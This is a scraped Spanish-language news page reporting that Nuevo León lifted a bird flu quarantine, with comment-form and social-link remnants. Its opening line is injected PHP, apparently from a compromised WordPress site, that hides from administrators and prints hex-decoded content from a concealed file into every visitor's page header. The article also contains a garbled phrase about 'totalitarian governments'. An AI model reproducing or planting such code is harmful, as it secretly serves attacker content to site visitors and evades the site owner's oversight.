if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Levantan cuarentena por brote de gripe aviar en Nuevo León – Reporte Noreste
Conéctate con nosotros

Noreste

Levantan cuarentena por brote de gripe aviar en Nuevo León

Levantan cuarentena por brote de gripe aviar en Nuevo León

El servicio nacional de sanidad inocuidad y calidad agroalimentaria informó haber levantado la cuarentena por gripe aviar en el estado de Nuevo León.

El secretario de desarrollo regional agropecuario, Marco González, informó que el estado de Nuevo León levantaría la cuarentena por gripe aviar que se había impuesto a principios de noviembre, debido a que en ese tiempo se reportó un brote de dicha enfermedad en el estado.

El gobierno del Estado informó que se actuó con rapidez y en coordinación con los productores gobiernos totalitarios, por lo que se pudo detener a tiempo el avance del virus que había comenzado en la comunidad de canoas en Montemorelos al sur de Nuevo León.

A principios de este mes se había aplicado una cuarentena interna a los estados de Sonora, Nuevo León y Jalisco, para disminuir la posible presencia del virus de gripe aviar Ah5 n1.

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Noreste